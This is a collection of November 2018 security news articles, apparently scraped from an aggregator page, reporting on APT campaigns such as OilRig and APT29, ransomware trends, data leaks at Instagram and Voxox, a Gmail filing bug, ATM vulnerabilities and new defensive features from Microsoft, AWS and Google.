Next year in April, Singapore will host SecurityWeek’s 2019 Singapore ICS Cyber Security Conference, an event dedicated to serving critical infrastructure and industrial internet stakeholders in the APAC region.
Iran-Linked Hackers Use Just-in-Time Creation of Weaponized Attack Docs
20.11.2018 securityweek APT
Researchers Analyzed How the Iran-linked "OilRig" Hacking Group Tests Malicious Documents Before Use in Attacks
Palo Alto Networks security researchers analyzed the testing process the Iran-linked cyber-espionage group OilRig has engaged in while preparing August 2018 attacks on a Middle-Eastern government.
The attacks targeted individuals of interest with malicious documents designed to deliver BONDUPDATER, a downloader that features DGA (domain generation algorithm) functionality. The attacks were carried out on August 26 and the threat actor created numerous delivery documents the week before, to test anti-virus detection rates.
Also tracked as APT34 and believed to have ties to the Iran government, OilRig has been active since at least 2014, mainly targeting financial, government, energy, telecoms and chemical organizations in the Middle East.
The group is known to be testing delivery documents and the TwoFace webshell, and the actor’s newly observed operational tempo shows once again how adversaries use online public anti-virus scanning tools to determine detection rates and find ways to evade them.
In preparation for an attack carried out on August 26, the actor created numerous test documents and submitted them to anti-virus engines just six days before. A total of three waves of testing were performed, to ensure lower detection rates.
The final test document, Palo Alto Networks security researchers reveal, was created less than 8 hours before the delivery document was created. The final document was then delivered to the intended victim via a spear-phishing email within 20 minutes after its creation.
A total of 11 samples were submitted across several public anti-virus testing sites. Interestingly enough, while the test documents were Microsoft Excel spreadsheets, the delivery document was a Microsoft Word file.
Some of the changes performed to the test documents resulted in an increase in detection rates, but helped the actor determine what specific contents in the file would cause anti-virus detections, which helped them in the creation of the actual delivery document.
While analyzing the file creation and testing patterns, the researchers observed an average of 33 seconds between the file creation times and the testing time and that the author was not concerned about breaking the macro functionality.
The author also changed functions to run dropped VBScripts, added sleep functionality to evade sandboxes, and also appears to have a preferred string obfuscation technique (replaces a string with each character in hexadecimal form that are concatenated together).
The analysis, Palo Alto Networks says, revealed a series of similarities between the macros in the Excel and Word documents, which suggests that the OilRig hackers “used the macro from the malicious Excel document as the basis for the malicious Word document.”
The actor used the same string obfuscation technique for both macros. The technique was used to obfuscate the “powershell” and “cmd.exe” strings within the embedded VBScript, as well as the built-in shell function.
The macro was modified for the creation of the delivery document, with the addition of a function meant to save the obfuscated BONDUPDATER PowerShell script to a file. The author also modified the variable used to store the VBScript and removed from the macro the function that displays a hidden spreadsheet containing the decoy content (which was not needed for the Word document).
“Comparison between what malware is eventually used in active campaigns versus in-development malware allows us to understand what adaptations and modifications were made to each iteration of malware. Additionally, witnessing specific functionality changes within the malware itself, we attempt to make correlations between the new and old functionality,” the security researchers conclude.
Microsoft Enhances Windows Defender ATP
20.11.2018 securityweek Security
Microsoft has unveiled several enhancements to its Windows Defender Advanced Threat Protection (ATP) product to improve its protection capabilities.
The improvements target various aspects of the endpoint protection platform, such as attack surface reduction, post-breach detection and response, automation capabilities, security insights, and threat hunting, Moti Gindi, General Manager, Windows Cyber Defense, explains.
Windows Defender ATP now has new attack surface reduction rules, designed to prevent Office communication applications (including Outlook) and Adobe Acrobat Reader from creating child processes. The new rules should help prevent a variety of attacks, such as those using macro and vulnerability exploits.
However, the company also added improved customization for exclusions and allow lists, which can be applied to folders and even individual files, Gindi reveals.
Now, Microsoft’s protection platform also takes advantage of emergency security intelligence updates. In the event of an outbreak, the Windows Defender ATP team can request cloud-connected enterprise devices to pull dedicated intelligence updates directly from the Windows Defender ATP cloud, thus eliminating the need for security admins to take action.
According to Microsoft, Windows Defender ATP blocks 5 billion threats every month, leveraging machine learning and artificial intelligence in the process. The technology also allows it to score high in various protection tests.
Dedicated detections for cryptocurrency mining malware is also available in the protection platform now, and Microsoft also increased focus on detecting and disrupting tech support scams. Recently, Windows Defender ATP’s antivirus also got a dedicated sandbox, to prevent attackers from leveraging it to compromise system.
To provide security analysis with means to better understand complex security events, Microsoft has added Incidents to Windows Defender ATP. Providing an aggregated view of an attack’s context, it can help identify related alerts and artifacts across impacted systems, as well as correlating them across the attack timeline.
“By transforming the queue from hundreds of individual alerts to a more manageable number of meaningful aggregations, Incidents eliminate the need to review alerts sequentially and to manually correlated malicious events across the organization, saving up to 80% of analyst time,” Gindi claims.
Windows Defender ATP can also automatically investigate and remediate memory-based attacks, also known as fileless attacks. Thus, instead of simply alerting on such an attack, the platform can launch a fully automated investigation into the incident.
Technical information on threats is provided through a Threat analytics dashboard, along with recommended actions to contain and prevent specific threats and increase organizational resilience. Additionally, Microsoft is offering an assessment of the impact of threats on an organization’s environment and a view of the number of protected and exposed machines.
Custom detection rules are also available, based on the queries security researchers share using the GitHub community repository, along with built-in capabilities for discovery and protection of sensitive data on enterprise endpoints, courtesy of integration with Azure Information Protection (AIP) Data Discovery.
Windows Defender ATP also integrates with Microsoft Cloud App Security for the discovery of shadow IT in an organization. This simplifies rollout of Cloud App Security discovery and provides Microsoft Cloud App Security with traffic information about client-based and browser-based cloud apps and services used on IT-managed Windows 10 devices.
Customers interested in testing the new features can sign up for a free 60-day fully featured Windows Defender ATP trial. The Windows Defender demo page and the Windows Defender security center portal also allow interested parties to take the features for a spin.
Suspected Russian Hackers Impersonate State Department Aide
19.11.2018 securityweek BigBrothers
WASHINGTON (AP) — U.S. cybersecurity experts say hackers impersonating a State Department official have targeted U.S. government agencies, businesses and think tanks in an attack that bears similarity to past campaigns linked to Russia.
The "spear phishing" attempts began on Wednesday, sending e-mail messages purported to come from a department public affairs official.
Cybersecurity companies CrowdStrike and FireEye both said they were still working to attribute the attack. But it was consistent with past hacking campaigns by Cozy Bear, or APT29, a Russian group believed to be associated with Russian intelligence and linked to hacking ahead of the 2016 U.S. presidential election.
The State Department said: "The Department is aware of the recent malicious cyber event involving the spoofing (impersonation) of a Department employee reported by U.S. cybersecurity firm FireEye. No Department networks were compromised by this malicious cyber attempt."
SamSam and GandCrab Illustrate Evolution of Ransomware
19.11.2018 securityweek Ransomware
2018 has seen a major divergence in the operation of ransomware: targeted versus ransomware as a service (RaaS). Two particular malware families have dominated each branch: SamSam (targeted) and GandCrab (RaaS). Targeted seeks high ransoms from relatively few victims, while RaaS seeks relatively small ransoms from a large number of victims.
The reason for the divergence is improving defenses against ransomware. The original spray-gun method of infection is no longer as effective as it used to be. User defenses against the malware are more effective, while decryptors are rapidly developed and made available to victims via the NoMoreRansom website and from other security firms.
RaaS emerged as a model to allow the malware developers to concentrate on software development and staying ahead of the defenders while selling or renting their product to multiple distributors -- regardless of the distributors' level of technical capability. By maintaining continuous improvement, the RaaS model ensures that the spray gun approach continues to be viable for the criminals.
The targeted approach is typified by SamSam. Since it is harder to automatically infect a system -- and even harder to automatically infect enough of a corporate network to make extortion viable -- the targeted approach aims to breach the network first, reconnoiter the infrastructure, and then encrypt the key areas to deliver maximum disruption to the whole network.
Both approaches have proven effective throughout 2018. Probably the best known successful SamSam attack was that delivered on the City of Atlanta in March 2018. The ransom was reportedly set at around $50,000 -- which the City declined to pay. However, as the city budget was being prepared in June, Daphne Rackley, the head of information management in Atlanta, announced that her department would need an additional $9.5 million because of the ransomware.
Public information on SamSam attacks is limited. Many victims simply pay the ransom. However, by following the money and tracking the bitcoin wallets used by the attackers, Sophos estimated in July 2018 that more than 230 victims had paid the ransom, and the criminals had netted nearly $6 million since SamSam first appeared in early 2016. In its latest report (PDF), Sophos estimates that total income from paid SamSam ransoms now exceeds $6.5 million.
The business model has proven so successful that SamSam is no longer the only ransomware used in highly targeted attacks against medium and large-scale organizations. Sophos points to two others in particular: BitPaymer and Ryuk. All three of these ransomwares target the Remote Desktop Protocol (RDP).
BitPaymer has been tied by ESET to the Dridex gang. Sophos suggests that there are multiple attacks per week, and that successful infections charge anything between $50,000 and $1 million for decryption.
Ryuk has been tied to the North Korean Lazarus group by Check Point. Like BitPaymer, there are multiple attacks per week. Ryuk charges victims around $100,000 for decryption. Like SamSam, there is no known decryptor for BitPaymer or Ryuk.
Sophos likens targeted ransomware to a cat burglar; and commodity RaaS ransomware to smash-and-grab raiding. In July 2018, Malwarebytes described GandCrab as the king of ransomware because it is the most prolific. It is commodity ransomware that tries to infect anything it comes across, and is delivered via RDP and by email and exploit kits. In contrast to the high ransoms demanded by targeted malware, GandCrab will demand as (relatively) little as $1000 (going up to $8000) from its victims.
Boczan traces the evolution of GandCrab, and the cat-and-mouse battle it has with defenders. On February 28, 2018, after law enforcement allegedly gained access to GandCrab C2s, BitDefender developed a decryptor for GandCrab v.1, and provided it to the NoMoreRansom website. On March 5, just one week later, the GandCrab developer released a new version, providing better protection of C2s, changing the encrypted file extension to .CRAB, performing kernel-mode AV checking, and -- most importantly -- mitigating the decryptor.
By July 2018, GandCrab had evolved into version 4. This version introduced new Salsa encryption, encrypted network shares, changed the extension to .KRAB, and removed itself on completion. Within days, version 4.1 was released, using hacked websites disguised as download sites for cracked applications. An analysis by Fortinet concluded that it may have been an experimental version, and that claims that it and version 4 could spread via the EternalBlue exploit were simply wrong.
Then followed a strange tit-for-tat between the GandCrab developer and South Korean firm AhnLab. AhnLab released a vaccine for GandCrab. GandCrab retaliated -- supposedly within hours -- by releasing an alleged zero-day against AhnLab's anti-virus product. "Their killswitch has became useless in only few hours," the GandCrab developer told Bleeping Computer. His own exploit, however, would be a "reputation hole for ahnlab for years."
The dispute became moot, however, with the release of GandCrab version 5 at the end of September. Versions 5.01 and 5.02 and 5.03 followed quickly. At this point, only version 1 had a decryptor available (although other vaccines appeared after AhnLab's original vaccine). On October 25, BitDefender announced a new decryptor for versions 1, 4 and 5.
"Twelve hours later," said Boczan in his GREHack presentation, "a new version." He describes the current state as no decryptor, challenging to track because of the packer, random file extension, less obvious C2 connection, and some chance for privilege escalation.
SamSam and GandCrab illustrate the evolution of the ransomware threat. Targeted attacks such as those by SamSam take more effort, require skilled adversaries, but generate much larger payouts. Given that standard advice to companies is not whether you will be hacked, but when you will be hacked, this threat is more likely to increase than decrease. Effectively, any medium or large organization is a potential target.
RaaS -- typified by GandCrab -- is a business run on business lines. GandCrab is rapidly and effectively supported with new versions very soon after any setback. It forms alliances with other criminals and even ran an underground competition before selecting NTCrypt as a crypter service partner. This too shows no sign of slowing.
Does Not Compute: Japan Cyber Security Minister Admits Shunning PCs
19.11.2018 securityweek BigBrothers
A Japanese minister in charge of cyber security has provoked astonishment by admitting he has never used a computer in his professional life, and appearing confused by the concept of a USB drive.
Yoshitaka Sakurada, 68, is the deputy chief of the government's cyber security strategy office and also the minister in charge of the Olympic and Paralympic Games that Tokyo will host in 2020.
In parliament on Wednesday however, he admitted he doesn't use computers.
"Since the age of 25, I have instructed my employees and secretaries, so I don't use computers myself," he said in a response to an opposition question in a lower house session, local media reported.
He also appeared confused by the question when asked about whether USB drives were in use at Japanese nuclear facilities.
His comments were met with incredulity by opposition lawmakers.
"It's unbelievable that someone who has not touched computers is responsible for cyber security policies," said opposition lawmaker Masato Imai.
And his comments provoked a firestorm online.
"Doesn't he feel ashamed?" wrote one Twitter user.
"Today any company president uses a PC. He doesn't even know what a USB is. Holy cow."
Another joked that perhaps Sakurada was simply engaged in his own kind of cyber security.
"If a hacker targets this Minister Sakurada, they wouldn't be able to steal any information. Indeed it might be the strongest kind of security!"
Sakurada has been in office just over a month, after being appointed in a cabinet reshuffle following Prime Minister Shinzo Abe's reelection as head of his political party.
But he has already come fire for other gaffes in parliament including garbling an opposition lawmaker's name and repeatedly stating "I don't know the details" when questioned about his new Olympic brief.
Smartphones: A Double-edged Sword for Terrorists
19.11.2018 securityweek Mobil
Bombs and guns aside, a smartphone can be a powerful weapon in the hands of a terrorist -- but it can also provide intelligence services with the tools to track them down.
Three years ago to the day, the Paris attacks of November 13, 2015 remain one of the best known examples of a large-scale assault that could not have been planned without phones.
The Islamic State group gunmen and bombers who struck the Bataclan concert hall and other nightlife spots used them extensively to coordinate the carnage, said a former French anti-terrorist official, speaking on condition of anonymity.
Just before entering the Bataclan, where they massacred 90 people, the attackers had sent a text message to accomplices in Belgium: "We're going ahead. It's started."
But if smartphones have been a "game-changer" for jihadists, their use by the world's extremists goes much further back than the Paris attacks.
"As of 2003, in Iraq, home-made bombs started being set off by the sending of an SMS as American convoys drove past. This caught on and was then repeatedly used by Al-Qaeda," the ex-official told AFP.
These days, encrypted apps such as Telegram, Wire and WhatsApp can help jihadists communicate while evading police tracking -- or at least complicate efforts to decode their messages.
For several years IS has published online tutorials in several languages explaining to jihadists how to choose the best software to evade detection in war zones.
For new recruits in developing countries, where smartphones are more common than computers, there are different strategies still.
"Phones are no longer phones -- they're computers," said Laurent Heslault, director of security strategies at Symantec, a security group.
"They are far more powerful than what we had on our desks 10 years ago," he added.
"They have more computing power, more memory and connection capabilities. They are very powerful tools when it comes to communicating."
That has also made it much easier for jihadist groups to recruit new members.
Smartphones "enable people to reach out for propaganda" with the swipe of a screen, said the retired official.
"Thirty years ago, guys used to exchange video cassettes, then it was CDs. Now it's online and can be looked up at any time."
For propaganda-makers, videos of attacks can be filmed and uploaded in the blink of an eye.
"You can film attacks, claim responsibility, use (a phone) to take photos and film reconnaissance operations," the ex-official said.
- Flip side of the phone -
But the smartphone can be an extremist's downfall as well as their best asset.
Intelligence agencies have grown better at using phones to identify suspects, spy on them -- and, in case of capture, lift data for use as evidence in court.
That in turn has raised difficult questions for tech giants who promise their users privacy.
Most famously, Apple faced a court showdown with the FBI after agents sought access to the data of the attackers who killed 14 people in San Bernardino, California, in December 2015.
Investigators dropped the case after finding a way into the phone without help from Apple, which argued that helping authorities access a phone would set a dangerous precedent.
Further afield, governments have used phone data extensively to pinpoint extremist suspects.
The French military intervention in Mali, launched in 2013 after jihadists took over the northern half the country, started with air strikes whose targets were chosen based on phone data, the former French official said.
"Today all air strikes focus on telephones," he added.
"Even if you keep changing the SIM card the phone has its own identity and once detected can continue being tracked."
And when it comes to police investigations, smartphones sometimes provide more information than their owners.
They might allow investigators to work their way back along an information trail, snare other members of a suspect's network, and track sleeper cells, he added.
"Smartphones make you a target," the expert said.
"Because of this jihadist leaders have learned to keep away from them. For the past few years, there's been a marked return to using human envoys," he added.
Instagram glitch exposed some user passwords
19.11.2018 securityaffairs Social
Instagram has suffered a serious security leak that might have exposed user’s passwords, revealed The Information website.
Instagram notified some of its users that it might have accidentally exposed their password due to a security glitch.
According to a company spokesperson, the bug was “discovered internally and affected a very small number of people.”
The news was first reported by The Information, the issue affects the “Download Your Data” tool implemented in April by Instagram to let users known which personal data the site had collected.
The feature was implemented by the social media platform in compliance with General Data Protection Regulation (GDPR).
“The security flaw was tied, ironically, to a tool Instagram introduced in April to let users see how much of their personal data the site had collected. “Download Your Data” lets users download all the data that Instagram has on them, both to comply with new European data-privacy regulations and to satisfy increasingly privacy-sensitive users around the world.” states a blog post published on The Information.
The company informed users that if they had used the “download your data” tool, their passwords were accidentally exposed because they were included in the URL.
“if someone submitted their login information to use the Instagram ‘Download Your Data’ tool, they were able to see their password information in the URL of the page. This information was not exposed to anyone else, and we have made changes so this no longer happens.” an Instagram spokesperson told The Verge.
The use of the tool on public networks could have exposed passwords to attackers, the company also notified users that passwords were also stored on Facebook’s computers.
Security experts fear the company is storing passwords in clear text, but a company spokesperson downplayed the issue, saying that the company only stores password hashes.
“If Instagram were storing passwords with the right encryption technology, this type of flaw shouldn’t be possible, according to Chet Wisniewski, principal research scientist at security firm Sophos.” continues The Information.
“He said the only way it could show up in the URL is if the password were stored somewhere inside of Instagram in plain text, which isn’t recommended in the security industry.”
“This is very concerning about other security practices inside of Instagram because that literally should not be possible. If that’s happening, then there are likely much bigger problems than that,” he said.
The Facebook-owned firm confirmed that the flaw was already fixed, it also suggests users change their passwords, as a precautionary measure.
This isn’t the first time that security implemented by Instagram was questioned by experts. On August, hundreds of its accounts were hijacked in what appeared to be the result of a coordinated attack, all the accounts shared common signs of compromise.
Alleged attackers modified personal information making impossible to restore the accounts.
In September 2017, Doxagram website claimed to be selling the email addresses and phone numbers of 6M High-Profiles Instagram accounts ranging from POTUS to Taylor Swift.
Million of password resets and two-factor authentication codes exposed in unsecured Vovox DB.
Sébastien Kaul, a security researcher based in Berlin, has discovered a poorly secured database owned by communication firm Vovox that contained left names, phone numbers, tens of millions of SMS messages, temporary passwords, two-factor codes, shipping alerts, and other information belonging to customers of companies including Microsoft, Amazon, and Google.
It has been estimated that the exposed archive included at least 26 million text messages year-to-date.
“Although Kaul found the exposed server on Shodan, a search engine for publicly available devices and databases, it was also attached to one of Voxox’s own subdomains.” reported Techcrunch.
“Worse, the database — running on Amazon’s Elasticsearch — was configured with a Kibana front-end, making the data within easily readable, browsable and searchable for names, cell numbers and the contents of the text messages themselves.”
Vovox promptly took down the database after TechCrunch informed the company with an inquiry.
Anyone that accessed to the database while it was exposed online could have obtained two-factor codes sent by users to access their accounts potentially exposing them to account take over.
Below TechCrunch’s findings from a cursory review of the data:
We found a password sent in plaintext to a Los Angeles phone number by dating app Badoo;
Several Booking.com partners were sent their six-digit two-factor codes to log in to the company’s extranet corporate network;
Fidelity Investments also sent six-digit security codes to one Chicago Loop area code;
Many messages included two-factor verification codes for Google accounts in Latin America;
A Mountain View, Calif.-based credit union, the First Tech Federal Credit Union, also sent a temporary banking password in plaintext to a Nebraska number;
We found a shipping notification text sent by Amazon with a link, which opened up Amazon’s delivery tracking page, including the UPS tracking number, en route to its destination in Florida;
Messenger apps KakaoTalk and Viber, and quiz app HQ Trivia use the service to verify user phone numbers;
We also found messages that contained Microsoft’s account password reset codes and Huawei ID verification codes;
Yahoo also used the service to send some account keys by text message;
And, several small to mid-size hospitals and medical facilities sent reminders to patients about their upcoming appointments, and in some cases, billing inquiries.
Kevin Hertz, Voxox’s co-founder and chief technology officer, wrote in an email that the company is “looking into the issue and following standard data breach policy at the moment,” and that the company is “evaluating impact.”
Hacking Gmail’s UX with from fields for phishing attacks
19.11.2018 securityaffairs Phishing
A glitch in Gmail could be exploited by hackers to carry out phishing attacks, the issue is related the way Gmail automatically files messages into Sent folder
A bug in Gmail could be exploited by attackers to carry out phishing attacks, the flaw ties the way Gmail automatically files messages into the “Sent” folder.
The bug that was discovered by software developer Tim Cotten, it could be exploited by an attacker to place emails into a person’s “Sent” folder, even if the person has never sent the messages.
Gmail moves an email into the Sent folder based on the address in the “from” field.
An attacker could exploit the bug by sending an email to a target, which has been specially crafted to have that target’s email address in the “from” field.
Gmail will move the email to both the target’s inbox and Sent folder.
“So it appears that by structuring the from field to contain the recipient’s address along with other text, the GMail app reads the from field for filtering/inbox organization purposes and sorts the email as though it were sent from [the recipient], despite it clearly also having the originating mailbox as [another address],” wrote the researcher.
This issue could be exploited by hackers in an attack scenario that sees it first sending a spam emails that is moved in the inbox of the target, then he will send out a follow-up email asking the victim to look back at previous messages for some reason and trick them into open something malicious.
“Imagine, for instance, the scenario where a custom email could be crafted that mimics previous emails the sender has legitimately sent out containing various links.” wrote Cotten.
“A person might, when wanting to remember what the links were, go back into their sent folder to find an example: disaster!
Don’t get me wrong, the user should still verify the details at the top of the email and might catch on that something is odd —but we know it only takes a small percentage of due-diligence failure to have a big environment effect.”
Cotten reported the findings to Google, he also cited another bug in Gmail filtering that was reported by “tekstar”:
“For example imagine Alice emails Bob and Chad, and in the ‘to:’ field for Bob she gives Bob a different name, like ‘Brad’ [but the address is still <firstname.lastname@example.org>],” tekstar said. “If Chad replies to this email, Bob will now be in his contact list as Brad. The email is still email@example.com but you can see how it could be malicious, or at least fodder for fun pranks.”
Suspected APT29 hackers behind attacks on US gov agencies, think tanks, and businesses
19.11.2018 securityaffairs APT
Last week, security experts reported alleged APT29 hackers impersonating a State Department official in attacks aimed at U.S. government agencies, businesses and think tanks.
Cyber security experts are warning of new attacks against U.S. government agencies, think tanks, and businesses.
Threat actors carried out spear phishing attacks impersonating a State Department official to attempt compromising targets, the attacks are similar to the ones associated with Russia-linked group APT29 (aka The Dukes, Cozy Bear and Cozy Duke).
APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.
The spear phishing messages were spotted this week, they purported to come from a department public affairs official.
Security researchers from CrowdStrike and FireEye are investigating the attacks in the attempt to attribute them to a specific threat actor.
“The Department is aware of the recent malicious cyber event involving the spoofing (impersonation) of a Department employee reported by U.S. cybersecurity firm FireEye. No Department networks were compromised by this malicious cyber attempt.” reads the statement released by the State Department.
6,500+ sites deleted after Dark Web hosting provider Daniel’s Hosting hack
19.11.2018 securityaffairs Hacking
On Thursday, November 15, hackers compromised Daniel’s Hosting, one of the largest Dark Web hosting provider, and deleted 6,500+ sites.
On Thursday, November 15, hackers compromised Daniel’s Hosting, one of the largest Dark Web hosting provider. The news was confirmed by Daniel Winzen, the software developer behind the hosting service.
Daniel’s Hosting became the largest Dark Web hosting provider earlier 2017 when Anonymous members breached and took down Freedom Hosting II.
More than 6500 Dark Web services hosted on the platform were completely deleted and the bad news is that it is not possible to recover them because there are no backups as per design choice of the operator.
Winzen explained that hackers breached into Daniel’s Hosting database and deleted all data. The attackers exploited a PHP zero-day exploit leaked just a day before the hack and that was already fixed in db626a54a4f5, but likely attackers used other flaws.
“On November 15th around 10-11 PM UTC the hosting server got hacked. As per my analysis it seems someone got access to the database and deleted all accounts.” Winzen wrote on the DH website today.
“Noteworthy, also the account “root” has been deleted. To this day around 6500 Hidden Services were hosted on the server. There is no way to recover from this breach, all data is gone. I might re-enable the service once the vulnerability has been found, but right now I first need to find it.”
Winzen his assessing the platform searching for vulnerabilities that attackers might have exploited to compromise the server.
“As of now I haven’t been able to do a full analysis of the log files and need to further analyze them, but based on my findings so far I believe that the hacker has only been able to gain administrative database rights. There is no indication of having had full system access and some accounts and files that were not part of the hosting setup were left untouched,” Winzen told ZDNet.
“I might re-enable the service once the vulnerability has been found, but right now I first need to find it.”
The source code of Daniel’s Hosting platform has been available as open-source on GitHub, a circumstance that might have helped the attackers in review the code and find zero-day flaws to exploit.
Who is the culprit?
It is very hard to attribute the attack to specific threat actors, cybercrime syndicates, nation-state hackers, intelligence, and law enforcement agencies are all possible suspects with valid motivations.
AWS Adds New Feature for Preventing Data Leaks
18.11.2018 securityweek Safety
Amazon announced this week that a new feature designed to prevent data leaks has been added to Amazon Web Services (AWS).
Improperly configured Simple Storage Service (S3) buckets can expose an organization’s sensitive files, as demonstrated by several incidents involving companies such as Viacom, Verizon, Accenture, Booz Allen Hamilton, and Dow Jones.
As a result of numerous incidents, AWS last year introduced a new feature that alerts users of publicly accessible buckets, but researchers have still found data leaks resulting from misconfigured buckets.
AWS’s latest attempt to prevent leaks is called Amazon S3 Block Public Access, which should provide an additional layer of protection for both an entire account and individual buckets.
Users can leverage Access Control Lists (ACLs) and bucket policies to specify who should be granted access. They can give access to specified accounts or IP addresses, or require the use of multi-factor authentication. However, there is still a chance that users may unintentionally grant public access to their buckets.
Amazon S3 Block Public Access aims to address this by providing settings for blocking existing public access and ensuring that public access is not granted to new items.
“If an AWS account is used to host a data lake or another business application, blocking public access will serve as an account-level guard against accidental public exposure. Our goal is to make clear that public access is to be used for web hosting!” said Jeff Barr, Chief Evangelist for AWS.
The new settings can be accessed from the S3 console, the command-line interface (CLI) or the S3 APIs, and they allow users to manage public ACLs and public bucket policies.
The user can disallow the use of new public bucket or object ACLs (without affecting existing items), or remove public access granted through public ACLs. They can also block new public bucket policies (without impacting existing items), or block public and cross-account access to buckets with public policies.
These settings can be applied to the entire account or to individual buckets. Each time a change is made, the user needs to provide confirmation by typing “confirm” into a text field and clicking a “Confirm” button.
The new feature is free and immediately available in all commercial AWS regions. Amazon has advised users to start using it to prevent data leaks.
Google Helps G Suite Admins Enforce Strong Passwords
18.11.2018 securityweek Android
Google this week announced new features to G Suite designed to help administrators enforce rigorous password requirements and increase security.
Strong passwords remain the first line of defense when it comes to protecting online accounts, and G Suite admins already had the option to specify minimum and maximum length limits for passwords, but additional options are now available to futher protect accounts.
Moving forth, G Suite admins can require users to set strong passwords, forcing those using weak passwords to change them to stronger ones. The setting, however, is disabled by default, meaning that admins need to specifically enable it.
Admins can also control when password length and strength requirements go into effect: either the next time a user changes their password, or the next time the users log into their accounts.
The default setting is to enforce the rule at next password change, but admins can modify that by simply checking the box next to “Start password policy enforcement at next sign in.”
G Suite admins can also prompt users to change their passwords after a certain number of days, but they also have the option to never ask the change.
With the new addition, Google is also allowing admins to prevent users from reusing old passwords. The setting is turned on by default, but admins can disable it by checking the box for “Allow password reuse.”
The newly implemented settings will become available for all G Suite customers in the next couple of weeks. The options will be accessible in the Admin console under Security > Password management.
As part of the new launch, Google also moved the password length (minimum and maximum) settings from the Basic Settings card to the newly introduced Password management card.
Google has a help article on how one can create a strong password. Admins too can access the help center for additional info on the options available for them.
Many ATMs Can be Hacked in Minutes: Report
18.11.2018 securityweek Hacking
Many automated teller machines (ATMs) lack adequate security mechanisms and can be compromised in minutes using various methods, according to a new report from vulnerability assessment firm Positive Technologies.
Assaults on ATMs aren’t new and attack techniques are plenty. Positive Technologies’ security researchers decided to have a look into how machines from different vendors are secured against various attacks. They discovered that many of the security mechanisms in place are simply a nuisance in most cases.
The researchers conducted their tests on 46 ATM machines from NCR, Diebold Nixdorf, and GRGBanking. The machines were running Windows XP, Windows 7, or Windows 10, and each had its own unique configuration.
Attack exposure varies according to factors such as the type of connection to the processing center, the installed software, and security features, the researchers say. They found that several vulnerabilities stemmed from issues such as insufficient network and peripheral security, improper configuration of systems or devices, and vulnerable or improper configuration of Application Control.
Manby attacks on ATMs are in an effort to steal cash located inside the machine. Other incidents, however, aim at stealing the information stored on the banking cards users insert into the ATMs.
According to the study, 85% of the ATMs that were analyzed are vulnerable to network-level attacks as means to fraudulently dispense the cash inside. With access to the network to which the machine is connected, an attacker would only need about 15 minutes to compromise the machine, the security researchers say.
The report also shows that 27% of the tested ATMs were vulnerable to the spoofing of processing center, an attack scenario where the connection to the processing center is not properly secured, allowing the attacker to manipulate the transaction confirmation process.
Vulnerabilities in available network services, such as poor firewall protection, use of vulnerable or out-of-date software versions, and improper configuration of security tools, can be exploited to compromise 58% of the tested ATMs, the study discovered. 23% of the ATMs are vulnerable to attacks targeting network devices connected to them.
Cybercriminals looking to steal cash from ATMs also engage into so called Black Box attacks, where, having physical access to the machine, they connect to the cash dispenser using malware or special devices. 69% of the tested devices were found vulnerable, with an attacker able to steal cash within 10 minutes.
Attackers may also attempt to run commands on the machine’s operating system, bypassing the usual restriction where the ATM users only interact with a single application, which runs in kiosk mode. 76% of the tested devices were found vulnerable.
The security researchers also reveal that the tested ATMs contained various configuration errors, with the majority of them involving insufficient restriction of user account rights.
The discovered issues include insufficient protection of communication with peripherals (96% of devices), use of outdated or vulnerable applications and OS versions (92%), vulnerabilities or improper configuration of Application Control (88%), insufficient local security policies (85%), unauthorized exit from kiosk mode (85%), and connection of arbitrary USB and PS\2 devices (81%).
“Most tested ATMs ran special software to selectively disable key combinations. However, in 85 percent of cases, standard key combinations remained available, including Alt+F4 (close active window) and Win+Ctrl, Alt+Tab, and Alt+Shift+Tab (switch task). This technique allowed closing the window of the ATM kiosk application and disabling the applications responsible for blocking arbitrary keyboard input,” Positive Technologies says.
92% of the tested ATMs were found to allow direct access to hard drive, thus allowing an attacker to gain control of the cash dispenser. 27% of the machines support boot from external disks, while 42% allow starting the OS in a special mode that can bypass security (such as kernel debug mode, Directory Service Restore Mode, and various safe modes).
All of the tested ATMs were vulnerable to attacks aiming at stealing users’ credit card data, either through skimmers (physical shims) placed on card readers, to steal information directly from the cards, or by targeting the data transmission between ATM operating system and card reader (100% of tested ATMs), or between the ATM and processing center (58% of tested ATMs).
“Logic attacks on ATMs are growing in popularity, with losses running in the millions of dollars. […] More often than not, security mechanisms are a mere nuisance for attackers: our testers found ways to bypass protection in almost every case. Since banks tend to use the same configuration on large numbers of ATMs, a successful attack on a single ATM can be easily replicated at greater scale,” Positive Technologies concludes.
Europol, Diebold Nixdorf to Share Information on Cyber Threats
18.11.2018 securityweek BigBrothers
Europol on Friday announced that it has signed a cybersecurity-focused memorandum of understanding (MoU) with Diebold Nixdorf, one of the world’s largest providers of ATM and point-of-sale (PoS) services.
According to Europol, the goal is to create a safer cyberspace for individuals, businesses and governments through the sharing of knowledge on cyber threats and attacks, and by exchanging expertise, best practices and technical information.
Steven Wilson, head of Europol’s European Cybercrime Centre (EC3), believes the partnership with US-based Diebold Nixdorf will improve the law enforcement agency’s capabilities and effectiveness in preventing, disrupting and prosecuting cybercrime targeted at the self-service industry.
“As a company with a strong global presence, a working cooperation of this type between Europol and Diebold Nixdorf is the most effective way in which we can hope to secure cyberspace for European citizens and businesses. I am confident that the high level of expertise our industry partners bring with them are going to result in a significant benefit to our Europe-wide investigations,” Wilson said.
On the other hand, the financial and retail technology giant believes the partnership with Europol will help it better protect customers from cyber threats.
It’s not uncommon for Diebold Nixdorf ATMs to be targeted by malware. One example is CUTLET MAKER, a piece of malware that leverages a Diebold Nixdorf library file to help attackers with physical access to an ATM instruct the device to dispense all its banknotes in a type of attack known as ATM jackpotting.
A report from January claimed that Diebold Nixdorf had set out alerts to warn customers of ATM jackpotting attacks in the United States.
A study conducted recently by Positive Technologies showed that many ATMs can be hacked in minutes. The study targeted ATMs from various vendors, including Diebold Nixdorf, and found that a majority of the devices contain at least one type of vulnerability.
Google Scours the Internet for Dirty Android Apps
18.11.2018 securityweek Android
Google is analyzing all the apps that it can find across the Internet in an effort to keep Android users protected from Potentially Harmful Applications (PHAs).
One week after launching the Android Ecosystem Security Transparency Report, Google decided to explain how it leverages machine learning techniques for detecting PHAs.
Google Play Protect (GPP), the security services that help keep devices with Google Play clean, analyzes more than half a million apps each day, and looks everywhere it can for those apps, the Internet search giant said.
AndroidThanks to the help of machine learning, Google says it is able to detect PHAs faster and scale better. The scanning system uses multiple data sources and machine learning models to analyze apps and evaluate the user experience.
